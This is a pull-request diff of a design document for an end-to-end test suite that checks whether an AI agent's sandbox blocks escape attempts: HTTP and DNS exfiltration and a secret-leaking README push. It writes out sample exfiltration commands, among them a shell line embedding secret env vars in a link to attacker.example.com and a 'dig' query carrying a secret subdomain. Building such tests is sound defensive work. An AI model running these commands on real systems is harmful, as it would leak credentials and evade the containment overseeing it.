docs(prd-0022): end-to-end sandbox-escape integration test #51
@@ -136,10 +136,13 @@ destination outside the bottle.
|
||||
- The bottle declares: a few allowlisted egress routes
|
||||
(api.anthropic.com, etc.), a git-gate upstream pointing
|
||||
at a throwaway repo, supervise off (not under test)
|
||||
- Plants a known `TEST_SECRET` value in the bottle's env.
|
||||
The value matches a gitleaks rule (e.g., shaped like an
|
||||
Anthropic API key) so the README test fires the right
|
||||
pre-receive rejection.
|
||||
- Plants three known secret env vars (matching three
|
||||
gitleaks rules — anthropic-api-key, AWS, generic
|
||||
high-entropy) so test 5 parameterizes over shapes.
|
||||
- A `setUpClass` preflight that verifies `curl`, `git`,
|
||||
`dig` exist in the agent container; raises
|
||||
`unittest.SkipTest` listing missing tools if any are
|
||||
absent (catches future backends with thinner images).
|
||||
- A `_run_in_agent(script)` helper that wraps
|
||||
`bottle.exec(script)` and returns an `ExecResult`.
|
||||
- Assertions per category that read the existing
|
||||
@@ -303,87 +306,130 @@ def test_4_dns_exfil_blocked(self):
|
||||
self.assertNotIn("ANSWER SECTION", result.stdout)
|
||||
```
|
||||
|
||||
### Attack-5: secret in README push (with ordering check)
|
||||
### Attack-5: secret in README push (multi-shape, with ordering check)
|
||||
|
||||
Parameterized over three secret shapes so a renamed
|
||||
gitleaks rule doesn't silently let one shape through.
|
||||
|
||||
```python
|
||||
SECRET_SHAPES = [
|
||||
("anthropic", "$TEST_SECRET_ANTHROPIC"),
|
||||
("aws", "$TEST_SECRET_AWS"),
|
||||
("generic", "$TEST_SECRET_GENERIC"),
|
||||
]
|
||||
|
||||
def test_5_readme_push_blocked(self):
|
||||
result = self.bottle.exec(
|
||||
'cd /tmp && git init test-repo && cd test-repo && '
|
||||
'git config user.email "test@example.com" && '
|
||||
'git config user.name "test" && '
|
||||
'echo "[click](https://attacker.example.com/?leak=$TEST_SECRET)" > README.md && '
|
||||
'git add . && git commit -m "leak" && '
|
||||
'git remote add origin '
|
||||
'git://claude-bottle-git-gate-<slug>/throwaway.git && '
|
||||
'git push origin master'
|
||||
)
|
||||
self.assertNotEqual(0, result.returncode)
|
||||
combined = (result.stderr + result.stdout).lower()
|
||||
# gitleaks ran and rejected.
|
||||
self.assertIn("gitleaks", combined)
|
||||
# AND: the rejection happened BEFORE git-gate tried to
|
||||
# forward to the unreachable upstream. Network errors
|
||||
# mentioning resolve / refused / unreachable would mean
|
||||
# gitleaks ran AFTER (sequence wrong) or didn't run.
|
||||
for upstream_phrase in (
|
||||
"could not resolve",
|
||||
"connection refused",
|
||||
"network is unreachable",
|
||||
"upstream",
|
||||
):
|
||||
self.assertNotIn(
|
||||
upstream_phrase, combined,
|
||||
f"unexpected upstream-phase phrase: gitleaks should "
|
||||
f"reject BEFORE git-gate attempts an upstream push",
|
||||
)
|
||||
for name, env_ref in SECRET_SHAPES:
|
||||
with self.subTest(secret=name):
|
||||
result = self.bottle.exec(
|
||||
'cd /tmp && rm -rf test-repo && '
|
||||
'git init test-repo && cd test-repo && '
|
||||
'git config user.email "test@example.com" && '
|
||||
'git config user.name "test" && '
|
||||
f'echo "[click](https://attacker.example.com/?leak={env_ref})" > README.md && '
|
||||
'git add . && git commit -m "leak" && '
|
||||
'git remote add origin '
|
||||
'git://claude-bottle-git-gate-<slug>/throwaway.git && '
|
||||
'git push origin master'
|
||||
)
|
||||
self.assertNotEqual(0, result.returncode)
|
||||
combined = (result.stderr + result.stdout).lower()
|
||||
# gitleaks ran and rejected.
|
||||
self.assertIn("gitleaks", combined)
|
||||
# AND: rejection BEFORE the unreachable upstream
|
||||
# was contacted — network-phase errors would
|
||||
# mean gitleaks ran late or not at all.
|
||||
for upstream_phrase in (
|
||||
"could not resolve",
|
||||
"connection refused",
|
||||
"network is unreachable",
|
||||
"upstream",
|
||||
):
|
||||
self.assertNotIn(
|
||||
upstream_phrase, combined,
|
||||
f"unexpected upstream-phase phrase for {name!r}: "
|
||||
f"gitleaks should reject BEFORE git-gate "
|
||||
f"attempts an upstream push",
|
||||
)
|
||||
```
|
||||
|
||||
The `<slug>` is templated via the bottle's known identity at
|
||||
fixture-time. The two-part assertion both confirms gitleaks
|
||||
fired AND that it fired before any upstream attempt — the
|
||||
ordering the sandbox depends on.
|
||||
fixture-time. Each subTest independently:
|
||||
- Confirms the rejection happened (returncode != 0)
|
||||
- Confirms gitleaks fired (`"gitleaks"` in output)
|
||||
- Confirms gitleaks fired BEFORE the upstream attempt
|
||||
(no network-phase phrases in output)
|
||||
|
||||
## Implementation chunks
|
||||
|
||||
Sized small.
|
||||
|
||||
1. **Fixture manifest + secret env-var plumbing.** Just the
|
||||
files under `tests/integration/fixtures/sandbox-escape/`
|
||||
and the test class scaffolding with `setUpClass` /
|
||||
`tearDownClass` bringing up + tearing down the bottle.
|
||||
1. **Fixture + scaffolding.** Files under
|
||||
`tests/integration/fixtures/sandbox-escape/`, the
|
||||
TestSandboxEscape class with `setUpClass` /
|
||||
`tearDownClass`, the three-secret env-var fixture
|
||||
(anthropic / AWS / generic shapes), and the
|
||||
`setUpClass` preflight that checks for `curl`, `git`,
|
||||
`dig` in the agent and SkipTests with the missing list.
|
||||
No attack tests yet.
|
||||
2. **Attack 1 + 2 (hostname + IP).** The simplest two —
|
||||
curl returns non-zero, that's the assertion.
|
||||
3. **Attack 3 (HTTP exfil shapes).** Parameterized over the
|
||||
four shapes via subTest. Likely surfaces gaps in current
|
||||
DLP coverage for header / path / query shapes.
|
||||
4. **Attack 4 (DNS exfil).** Exact-match-allowlist
|
||||
verification.
|
||||
5. **Attack 5 (README push via git-gate).** Hardest because
|
||||
it requires the git-gate sidecar configured and the
|
||||
gitleaks rule fired. The "throwaway" upstream URL is
|
||||
intentionally unreachable to keep the test fully
|
||||
self-contained. Ordering assertions confirm gitleaks
|
||||
fires before any upstream push attempt.
|
||||
2. **Attack 1 + 2 (hostname + IP).** Curl exit-code
|
||||
assertions. Also covers the host-header spoof via
|
||||
`curl --resolve`.
|
||||
3. **Attack 3 (HTTP exfil shapes).** Parameterized over
|
||||
the four shapes (path, query, body, header) via
|
||||
subTest. **This chunk is authoritative** — if any shape
|
||||
leaks today, the chunk expands to include the
|
||||
remediation PRD work for that shape before merging.
|
||||
May fan out into multiple sub-PRs (one per leaking
|
||||
shape) coordinated as a chunk-3 epic.
|
||||
4. **Attack 4 (DNS exfil).** Two sub-assertions:
|
||||
crafted-subdomain-via-pipelock + direct
|
||||
`dig @8.8.8.8` from the agent's `--internal` network.
|
||||
5. **Attack 5 (README push via git-gate).** Hardest
|
||||
because of the multi-secret-shape parameterization +
|
||||
git-gate-must-be-up requirement + the gitleaks-ordering
|
||||
assertions. The "throwaway" upstream URL is
|
||||
intentionally unreachable.
|
||||
|
||||
6. **CI integration (best-effort).** Add a Gitea Actions
|
||||
job that runs the suite against the Docker backend.
|
||||
Marked `continue-on-error: true` so the workflow doesn't
|
||||
fail if docker-in-docker constraints prevent compose-up.
|
||||
If the runner shape evolves later (e.g., privileged
|
||||
Docker socket access) the suite slots in cleanly.
|
||||
Marked `continue-on-error: true` so the workflow
|
||||
doesn't fail if docker-in-docker constraints prevent
|
||||
compose-up. If the runner shape evolves later
|
||||
(privileged Docker socket access) the suite slots in
|
||||
cleanly.
|
||||
|
||||
## Resolved questions
|
||||
|
||||
1. **Pipelock DLP coverage for non-body shapes.** Resolved:
|
||||
**authoritative.** Every HTTP-exfil shape (path / query /
|
||||
body / header) MUST block for the suite to pass. If a
|
||||
shape leaks today, it's a real sandbox gap and the
|
||||
remediation lands BEFORE this test merges, not after.
|
||||
The project's purpose is sandbox integrity; shipping a
|
||||
test that documents "we knowingly leak headers" is
|
||||
worse than not shipping the test. May expand the
|
||||
delivery into "this test PRD + N remediation PRDs"
|
||||
depending on what attack 3 surfaces.
|
||||
|
||||
2. **DNS exfil via the agent's direct DNS resolver.**
|
||||
Resolved: **add the assertion to test 4.** The
|
||||
`--internal` network has no default gateway, so a direct
|
||||
`dig @8.8.8.8 <SECRET>.example.com` from the agent
|
||||
should fail. Test 4 grows a second assertion: in
|
||||
addition to the crafted-subdomain-via-pipelock attempt
|
||||
(which pipelock's exact-match allowlist rejects), the
|
||||
agent's direct DNS query is also blocked. Both
|
||||
sub-assertions must pass for test 4 to be green.
|
||||
should fail. Test 4 grows a second sub-assertion
|
||||
alongside the crafted-subdomain-via-pipelock check.
|
||||
|
||||
3. **Realistic fake secret.** Resolved: **multiple
|
||||
shapes, parameterized.** The README attack (test 5)
|
||||
loops over a tuple of secret shapes — anthropic-api-key,
|
||||
AWS key (AKIA...), and a generic high-entropy string —
|
||||
running the push-attempt N times. Each iteration is a
|
||||
subTest. Catches the case where one gitleaks rule
|
||||
lapses but another still fires; also makes the test
|
||||
resilient to rule renames. The fixture bottle's env
|
||||
carries `TEST_SECRET_ANTHROPIC` / `TEST_SECRET_AWS` /
|
||||
`TEST_SECRET_GENERIC` rather than one combined
|
||||
`TEST_SECRET`.
|
||||
|
||||
4. **Reachability of throwaway git upstream + gitleaks
|
||||
ordering.** Resolved: **add ordering assertions to test 5.**
|
||||
@@ -397,61 +443,33 @@ Sized small.
|
||||
`"network is unreachable"`, or `"upstream"` — those
|
||||
would mean gitleaks let the push through and the
|
||||
failure happened later in the chain.
|
||||
The second assertion is the "ordering" check — if it
|
||||
fires, gitleaks ran AFTER the upstream attempt
|
||||
(sequence is wrong) or didn't run at all.
|
||||
|
||||
5. **CI vs. local-only.** Resolved: **attempt CI; accept
|
||||
local-only fallback if docker-in-docker blocks it.**
|
||||
The Gitea Actions runner ecosystem usually has Docker
|
||||
available to the workflow but not nested Docker
|
||||
compose inside a containerized runner. v1 tries: add a
|
||||
CI job that runs the suite against the Docker backend
|
||||
on a runner with Docker socket access. If the
|
||||
compose-up step fails because of DiD constraints, the
|
||||
Add a Gitea Actions job that runs the suite against the
|
||||
Docker backend on a runner with Docker socket access.
|
||||
If compose-up fails because of DiD constraints, the
|
||||
job is marked `continue-on-error: true` and the suite
|
||||
stays local-only until we have a runner shape that can
|
||||
host it.
|
||||
|
||||
## Open questions
|
||||
6. **Backend-agnostic invocation when backend missing.**
|
||||
Resolved: **die (current behavior).** `get_bottle_backend()`
|
||||
already dies with a clear message naming the unknown
|
||||
backend; the test surfaces that as a hard error
|
||||
rather than a skip. Forces the developer to set
|
||||
`CLAUDE_BOTTLE_BACKEND` to a real implementation —
|
||||
surprise-skips on smolmachines branches that forgot to
|
||||
set the env var are worse than a loud failure.
|
||||
|
||||
1. **What does today's pipelock actually do for shapes 3.1,
|
||||
3.2, 3.4?** DLP body-scanning is a known feature; URL /
|
||||
path / header scanning is less clear. The test will tell
|
||||
us — if a shape passes today (attack succeeds), it's a
|
||||
real gap and the test fails LOUDLY rather than silently
|
||||
passing. Either:
|
||||
- Treat the test as authoritative: every shape MUST block
|
||||
for the suite to pass. Failing shapes are real bugs.
|
||||
- Treat the test as descriptive: mark the failing shapes
|
||||
`expectedFailure` and resolve them in a follow-up PRD.
|
||||
|
||||
Lean toward the first — the project's purpose is sandbox
|
||||
integrity; documenting "we knowingly leak headers" is
|
||||
worse than fixing it. But for v1 of this test it's OK to
|
||||
land with `expectedFailure` markers + tickets.
|
||||
|
||||
3. **Realistic fake secret.** `sk-ant-api03-...` shape is
|
||||
what gitleaks's anthropic-api-key rule matches. Verify
|
||||
the exact regex before settling on the fixture value;
|
||||
wrong-shape secret would mean attack 5 silently passes
|
||||
the wrong way (gitleaks doesn't fire, README ships).
|
||||
|
||||
6. **Backend-agnostic invocation.** The suite reads
|
||||
`CLAUDE_BOTTLE_BACKEND` so it runs against whatever
|
||||
backend is active. For the smolmachines spike, the
|
||||
developer sets that env var + runs the same test file.
|
||||
No code change needed in the suite itself. Worth
|
||||
verifying the existing `get_bottle_backend()` machinery
|
||||
handles the backend-not-yet-implemented case gracefully
|
||||
(it dies with a clear message today — confirm that's
|
||||
what we want).
|
||||
|
||||
7. **Test environment requirements.** The agent container
|
||||
needs `curl`, `git`, `dig`. Already in today's Docker
|
||||
image; need to declare these as required for any
|
||||
future backend's base image too. Worth noting in the
|
||||
smolmachines PRD.
|
||||
7. **Test environment requirements: enforce via preflight.**
|
||||
Resolved: **preflight check in `setUpClass`.** After
|
||||
bringing the bottle up, run `which curl && which git
|
||||
&& which dig` inside the agent container; if any tool
|
||||
is missing, raise `unittest.SkipTest` with the missing
|
||||
list. Catches a future backend that ships a thinner
|
||||
base image without producing five confusing
|
||||
command-not-found failures down the suite.
|
||||
|
||||
## References
|
||||
|
||||
|
||||
Reference in New Issue
Block a user